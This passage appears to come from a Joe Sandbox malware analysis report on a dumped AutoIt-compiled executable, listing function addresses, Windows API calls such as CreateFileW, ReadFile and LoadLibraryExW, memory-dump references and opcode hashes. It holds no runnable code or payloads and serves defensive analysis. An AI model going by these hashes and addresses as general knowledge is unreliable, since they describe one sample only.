                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                            • String ID:
                            • API String ID: 1438897964-0
                            • Opcode ID: 6bb47f08c974be823de5aed410dd24894238f4bfff6955b9b9dcac7d58031aa4
                            • Instruction ID: d2495673c4fee3eb6c607412929b4244694c9ef006468b771009865281bd0dd5
                            • Opcode Fuzzy Hash: 6bb47f08c974be823de5aed410dd24894238f4bfff6955b9b9dcac7d58031aa4
                            • Instruction Fuzzy Hash: F1116A729083069FC700DF2AD845A0EBFE8EF95750F10451EF040A32B1DB719999CFA2
                            Function 00D45C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                            Download Yara Rule
                            APIs
                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D45CC7
                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00D7DD73
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: 0212d67f203df633530240b2a9acaaa4621a24bdbe6dc89e49ad1444547c34b6
                            • Instruction ID: ff3fda396e386ca2f2accadc07a7e64dd504f98cb00a2f70abcae1eca02942cd
                            • Opcode Fuzzy Hash: 0212d67f203df633530240b2a9acaaa4621a24bdbe6dc89e49ad1444547c34b6
                            • Instruction Fuzzy Hash: A5019270284749BFF3210E25DCCAF763BDCEB01768F148319BAE59A1E1C6B45C488B60
                            Function 00D60DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D6571C: __FF_MSGBANNER.LIBCMT ref: 00D65733
                              • Part of subcall function 00D6571C: __NMSG_WRITE.LIBCMT ref: 00D6573A
                              • Part of subcall function 00D6571C: RtlAllocateHeap.NTDLL(00900000,00000000,00000001,00000000,?,?,?,00D60DD3,?), ref: 00D6575F
                            • std::exception::exception.LIBCMT ref: 00D60DEC
                            • __CxxThrowException@8.LIBCMT ref: 00D60E01
                              • Part of subcall function 00D6859B: RaiseException.KERNEL32(?,?,?,00DF9E78,00000000,?,?,?,?,00D60E06,?,00DF9E78,?,00000001), ref: 00D685F0
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                            • String ID:
                            • API String ID: 3902256705-0
                            • Opcode ID: 4bc9db7035cfc049cdaccd3186b962762e802c773c163fcb8d63156f6c57779f
                            • Instruction ID: 396606b42239d2789166c7d7b2d1c2417239b2dc8d291113e51531dace066769
                            • Opcode Fuzzy Hash: 4bc9db7035cfc049cdaccd3186b962762e802c773c163fcb8d63156f6c57779f
                            • Instruction Fuzzy Hash: CBF0A43550021D67CB10FA94EC01AEFBBADDF11311F144566F90896781DF719A8496F1
                            Function 00D655FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __lock_file_memset
                            • String ID:
                            • API String ID: 26237723-0
                            • Opcode ID: 8690af49f1c0677468bf6bcc973b514ba8e52455b2ce04cc20cbd1fd5ef5abb0
                            • Instruction ID: d49a595299a8a6d57e30747d18b294dfcd51c2914f5e44c33f2e9759b29d88ea
                            • Opcode Fuzzy Hash: 8690af49f1c0677468bf6bcc973b514ba8e52455b2ce04cc20cbd1fd5ef5abb0
                            • Instruction Fuzzy Hash: 8F01D071800A08EFCF11AFA8EC025AE7B61EF51361F548255F45417155DB718591EFB1
                            Function 00D653A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            • __lock_file.LIBCMT ref: 00D653EB
                              • Part of subcall function 00D66C11: __lock.LIBCMT ref: 00D66C34
                            • __fclose_nolock.LIBCMT ref: 00D653F6
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                            • String ID:
                            • API String ID: 2800547568-0
                            • Opcode ID: 8ed865aa769847f07583da04536561cc8df9af6c11a7f4703fec89c407a59996
                            • Instruction ID: 3c0a705661693e0dbf72faf278c52132023e2d58076383d1ab29ff13162a7da9
                            • Opcode Fuzzy Hash: 8ed865aa769847f07583da04536561cc8df9af6c11a7f4703fec89c407a59996
                            • Instruction Fuzzy Hash: 08F09671800A04DBDB10AF69A8017AD76A0AF41774F258309A464AB2C5CFBC9985AF71
                            Function 00D69E2B Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • InitializeCriticalSectionEx.KERNELBASE(00000000,00000000,00D69A0E,?,00D69D0B,00000000,00000FA0,00000000,00DFA1A8,00000008,00D69C22,00000000,00000000,?,00D69A7C,0000000D), ref: 00D69E44
                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000000,?,00D69D0B,00000000,00000FA0,00000000,00DFA1A8,00000008,00D69C22,00000000,00000000,?,00D69A7C,0000000D), ref: 00D69E4E
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CriticalInitializeSection$CountSpin
                            • String ID:
                            • API String ID: 4156364057-0
                            • Opcode ID: 0ece6e2031b5e48b03f9a4cd2766ca474b2f29c1f85a56b01f8af18c5a9e1255
                            • Instruction ID: 64d6eb4c3b2eb13a2e3b22381d7c55acec1a1db9ccc8a0241c3e6733d513a911
                            • Opcode Fuzzy Hash: 0ece6e2031b5e48b03f9a4cd2766ca474b2f29c1f85a56b01f8af18c5a9e1255
                            • Instruction Fuzzy Hash: 40D0677205424DBFCF029F94EC048AA7FAAFB48615B448420F91C8A530D772A561AB90
                            Function 00D4F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5fe2336d5a1e6424c4957b2f7f02c9087e948e043733db908016bfbbb7b17207
                            • Instruction ID: f9d48dffb3c41de21bf175ee9da731886b68e629d16b2d948792eaa3c8c235d1
                            • Opcode Fuzzy Hash: 5fe2336d5a1e6424c4957b2f7f02c9087e948e043733db908016bfbbb7b17207
                            • Instruction Fuzzy Hash: 84619B7060020A9FCB10EF64C885AABB7F5EF45304F188479E94A972A1DB71ED51CB71
                            Function 00D51FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6c678e2d105d944e9c0b604dc2a1ebc91e2318f31050389d35dad6b04d40fd6d
                            • Instruction ID: 3364e42da555f6a593f4935ae74190ccf094c6b432e5d6ed4afc3e0b499c4469
                            • Opcode Fuzzy Hash: 6c678e2d105d944e9c0b604dc2a1ebc91e2318f31050389d35dad6b04d40fd6d
                            • Instruction Fuzzy Hash: 1C514F31600604ABCF14EF68C991EAE77A6EF45320F1845A8FC46AB396DB31ED05CB71
                            Function 00D45AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000), ref: 00D45B96
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: f1fbb0baa4ce8d7777f92406b6d551a18749339a1783c44e7a1b04f7d21f9f22
                            • Instruction ID: 984d2dace34ba901d004f550d7722cf6469a5a8f0974ad3ccc4f46aeaa90904a
                            • Opcode Fuzzy Hash: f1fbb0baa4ce8d7777f92406b6d551a18749339a1783c44e7a1b04f7d21f9f22
                            • Instruction Fuzzy Hash: B1314D31A00B16AFCB18DF6CD880AADF7B5FF44310F188629D81993719D770B990CBA1
                            Function 00D60C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ProtectVirtual
                            • String ID:
                            • API String ID: 544645111-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: a9480683ee2735c8d45b30a79e8d84ffcc8aa9f42b0c4106a46d3ffb7cdf3d4f
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: D5310270A001059FC718DF08C484A6AFBA6FF59300B2A87A5E84ACB351DB31EDD1DBE0
                            Function 00D7FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: b3228d7be0787b7d8c13d9ef892c28915993ca79c538f69abee73c3877c2c72a
                            • Instruction ID: e195c8949ee5c7d0221368fc585ae6077549876215eeb2f2759d654460e05eaf
                            • Opcode Fuzzy Hash: b3228d7be0787b7d8c13d9ef892c28915993ca79c538f69abee73c3877c2c72a
                            • Instruction Fuzzy Hash: E64107746083518FDB24DF18C484B1ABBE1BF45314F0988ACE8998B362D732EC45CF62
                            Function 00D606FE Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6dbb6b0dd0e21a5baa57b0cef4d1e408c9bdd22a1601ee47f684ba2cfd1052f6
                            • Instruction ID: c8d9b0db3e374a5cebea887d518193f4813013fb05250c0985c454fc2cbf43ae
                            • Opcode Fuzzy Hash: 6dbb6b0dd0e21a5baa57b0cef4d1e408c9bdd22a1601ee47f684ba2cfd1052f6
                            • Instruction Fuzzy Hash: 53215035405209AFD721DF24D84BBD6BFA4FF46320B06859EE8C547852D7704447CFA5
                            Function 00D459B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 4143f2aca9017c502c94a940fd898ea5657b7b28aac7ab53a04e78bf509c87d0
                            • Instruction ID: 308d0a6bdbd2f8d8959d010e1ec46bf14d89339ce0232fdbf761e57916794edd
                            • Opcode Fuzzy Hash: 4143f2aca9017c502c94a940fd898ea5657b7b28aac7ab53a04e78bf509c87d0
                            • Instruction Fuzzy Hash: 93210271900B08EBCB059F65F8806AA7FB9FF48310F21C86AE489C5115EBB0D5E0DB71
                            Function 00D44DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00D44BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00D44BEF
                              • Part of subcall function 00D6525B: __wfsopen.LIBCMT ref: 00D65266
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E0F
                              • Part of subcall function 00D44B6A: FreeLibrary.KERNEL32(00000000), ref: 00D44BA4
                              • Part of subcall function 00D44C70: _memmove.LIBCMT ref: 00D44CBA
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Library$Free$Load__wfsopen_memmove
                            • String ID:
                            • API String ID: 1396898556-0
                            • Opcode ID: 2f79d45b12a78979ee49dd460d3a8a391de992aa6f65facb09a61c8e30d45ed1
                            • Instruction ID: 74f75957ff87f5b6a02874ed67110d5b61d5b7f80359929f3f60cb4795f5800c
                            • Opcode Fuzzy Hash: 2f79d45b12a78979ee49dd460d3a8a391de992aa6f65facb09a61c8e30d45ed1
                            • Instruction Fuzzy Hash: 3D11A331600306ABCF15AF70C816FAEB7A9EF44710F10882DF542A7181EA719E959B71
                            Function 00D7FD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClearVariant
                            • String ID:
                            • API String ID: 1473721057-0
                            • Opcode ID: 0113a29138f8cac944a848295755b1b3c4bcd3f99cd3211491a5c228ef6e70d8
                            • Instruction ID: 8e92aba40b279cd70d2bb431a0f36bda0f3e10ee20abbf625628389640b0a189
                            • Opcode Fuzzy Hash: 0113a29138f8cac944a848295755b1b3c4bcd3f99cd3211491a5c228ef6e70d8
                            • Instruction Fuzzy Hash: 4A21F374A08351DFDB14DF64C444A1BBBE1BF88314F09896CF89A57762D731E849CBA2
                            Function 00D45BC0 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON
                            Download Yara Rule
                            APIs
                            • ReadFile.KERNELBASE(?,?,00010000,?,00000000), ref: 00D45C16
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FileRead
                            • String ID:
                            • API String ID: 2738559852-0
                            • Opcode ID: 51468256a4a91f830c7e97ee739500e2c43c9c1d0780a62731f90c51c77bfb3c
                            • Instruction ID: 00b83b909ddd267407e35c480d18ee03a02cb001be4122d2099c45a607978832
                            • Opcode Fuzzy Hash: 51468256a4a91f830c7e97ee739500e2c43c9c1d0780a62731f90c51c77bfb3c
                            • Instruction Fuzzy Hash: 91113635200B059FD3208F19E880B62B7F9EF44760F14C92EE9AA86A56D7B0E844CB60
                            Function 00D45A7A Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID:
                            • API String ID: 4104443479-0
                            • Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                            • Instruction ID: 1bcf5ee696a6193d1a20bd4998fb410082d10bb4e2058e1aa78f48edd0095e81
                            • Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                            • Instruction Fuzzy Hash: AC017CB5600A02AFC705EB28D441D2AFBAAFF8A3107148569F859C7702DB31EC21CBF0
                            Function 00D64863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            • __lock_file.LIBCMT ref: 00D648A6
                              • Part of subcall function 00D68B28: __getptd_noexit.LIBCMT ref: 00D68B28
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            • Opcode ID: cffb8a953813f68d7e04b4d390b2e60127887f6250b37dee7ed79cf03a1fe832
                            • Instruction ID: f49aa7f55d59a969dba39321f6ccf4e2789d0b0a20123ef3043ddae6cb8d195c
                            • Opcode Fuzzy Hash: cffb8a953813f68d7e04b4d390b2e60127887f6250b37dee7ed79cf03a1fe832
                            • Instruction Fuzzy Hash: C1F0C271901649EBDF11AFB88C067AE7BA1EF10325F158614F4249B191CB78C951EF71
                            Function 00D44E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • FreeLibrary.KERNEL32(?,?,00E052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00D44E7E
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 51fe473e263e6a9fc44a0a986c1be3396793efab5d43c79812298bd26203d5ad
